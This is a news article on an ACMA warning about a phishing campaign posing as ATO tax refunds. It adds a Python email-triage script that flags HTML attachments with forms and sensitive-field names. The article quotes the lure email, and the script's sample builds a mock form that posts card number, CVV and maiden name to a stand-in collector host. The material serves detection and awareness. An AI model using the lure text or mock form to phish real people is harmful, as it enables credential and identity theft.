The Australian Communications and Media Authority is warning against the ‘financial institutions smart phish’ campaign, which can ‘dynamically adapt its content to request customer credentials for almost every financial institution currently operating in Australia.’
Affected emails are arriving in people’s inboxes with an attached HTML file, with the text of the email encouraging recipients to open up the file.
An example of the text in the email is as follows:
“After the last calculation of your fiscal activity, we have determined that you are eligible to receive a refund of $699.64
“In order to receive your tax refund, please follow next steps:
“Save the attached form on your PC and open it in a web browser (e.g. Chrome, Safari or Firefox). If you can't save the attached form, please use a different browser.
“Once opened, you will be provided with the steps to complete your tax refund application form.
“Complete the attached form accurately to avoid delays in processing your application.
“We will refund your tax within 30 days after you submit the form.
“Tax Refund Department
“Australian Taxation Office”.
The form presented dynamically changes to ask you about your credit card type and other personal information like driver’s license, Medicare card, passport number and other details - even your mother’s maiden name and pet’s name!
Clearly, the information requested by the scam is elaborate enough to help the scammers perpetrate further identity and account take-over fraud.
ACMA warns that ‘this “smart” form can even identify incorrectly entered information, such as an invalid credit card number or too many/too few alpha or numeric characters. “Help” fields also appear to assist data entry. All of these features help to make the form look legitimate.’
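The technique ACMA describes is an HTML file, delivered as an attachment, that carries its own form and client-side validation script. From a mail-filtering point of view that combination is the thing to look for, and a gateway or triage script can flag it before the attachment ever reaches an inbox. The script below is an added example written for this article; it is not ACMA's tooling and not anything from the campaign. It parses an email, pulls out HTML attachments, and reports any that contain a form, script blocks, a form posting to an external URL, or input fields whose names suggest the data types named above (card number, CVV, Medicare, passport, licence, mother's maiden name). The sample message, the `example.invalid` addresses and the field-name keyword list are constructed for the demonstration.

```python
import email
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser

# Field-name fragments that suggest a credential/identity harvesting form.
# Constructed for this example from the data types the ACMA warning lists.
SENSITIVE_FIELDS = (
    "card", "cvv", "expir", "password", "medicare", "passport",
    "licen", "maiden", "tfn", "bsb",
)


class FormScanner(HTMLParser):
    """Collects form, input and script indicators from one HTML document."""

    def __init__(self):
        super().__init__()
        self.forms = 0
        self.scripts = 0
        self.sensitive_inputs = []
        self.external_actions = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms += 1
            if a.get("action", "").lower().startswith(("http://", "https://")):
                self.external_actions.append(a["action"])
        elif tag == "script":
            self.scripts += 1
        elif tag in ("input", "select", "textarea"):
            # Match against name, id, placeholder and type so renamed fields still trip.
            label = " ".join(a.get(k, "") for k in ("name", "id", "placeholder", "type")).lower()
            if any(word in label for word in SENSITIVE_FIELDS):
                self.sensitive_inputs.append(a.get("name") or a.get("id") or label.strip())


def html_attachments(raw_message: bytes):
    """Yield (filename, decoded_html) for every HTML attachment in a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    for part in msg.walk():
        filename = (part.get_filename() or "").lower()
        looks_html = part.get_content_type() == "text/html" or filename.endswith((".html", ".htm"))
        is_attachment = part.get_content_disposition() == "attachment" or filename.endswith((".html", ".htm"))
        if looks_html and is_attachment:
            yield part.get_filename() or "(unnamed)", part.get_payload(decode=True).decode("utf-8", "replace")


def triage(raw_message: bytes) -> list:
    """Return a list of findings, one per suspicious HTML attachment; empty means nothing flagged."""
    findings = []
    for filename, body in html_attachments(raw_message):
        scanner = FormScanner()
        scanner.feed(body)
        reasons = []
        if scanner.forms:
            reasons.append(f"{scanner.forms} form(s)")
        if scanner.sensitive_inputs:
            reasons.append("sensitive fields: " + ", ".join(scanner.sensitive_inputs))
        if scanner.scripts:
            reasons.append(f"{scanner.scripts} script block(s)")
        if scanner.external_actions:
            reasons.append("posts to: " + ", ".join(scanner.external_actions))
        if reasons:
            findings.append({"attachment": filename, "reasons": reasons})
    return findings


def build_sample() -> bytes:
    """Constructed lure resembling the campaign: text body plus an HTML form attachment."""
    msg = EmailMessage()
    msg["From"] = "refunds@example.invalid"   # constructed sender
    msg["To"] = "recipient@example.invalid"   # constructed recipient
    msg["Subject"] = "Tax refund"
    msg.set_content("Save the attached form on your PC and open it in a web browser.")
    html = (
        '<html><body><form action="https://collector.example.invalid/submit">'
        'Card number <input name="cardnumber"> CVV <input name="cvv"> '
        "Mother's maiden name <input id=\"maiden_name\"> <input type=\"submit\"></form>"
        "<script>function check(n){ /* client-side number validation */ }</script>"
        "</body></html>"
    )
    msg.add_attachment(html, subtype="html", filename="Refund_Form.html")
    return bytes(msg)


def build_benign() -> bytes:
    """Constructed plain-text message with no attachment, for comparison."""
    msg = EmailMessage()
    msg["From"] = "colleague@example.invalid"
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = "Lunch"
    msg.set_content("Are you free at noon?")
    return bytes(msg)


if __name__ == "__main__":
    for finding in triage(build_sample()):
        print(finding["attachment"], "->", "; ".join(finding["reasons"]))
```

In practice this runs at the mail gateway or in a SOC triage pipeline over the raw `.eml`; the point is that an HTML attachment carrying a `<form>` with card, licence or Medicare fields has no legitimate reason to exist in inbound mail, which is the same conclusion ACMA reaches from the user's side.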
To avoid being scammed, ACMA advises the solution is ‘simple — never open forms attached to emails. No reputable organisation will ask you for information in this way.’
ACMA also advises turning on two-factor authentication on accounts that offer it, and recommends its Stay Smart Online site ‘for further tips on how to avoid having your personal information exposed to a phishing campaign.’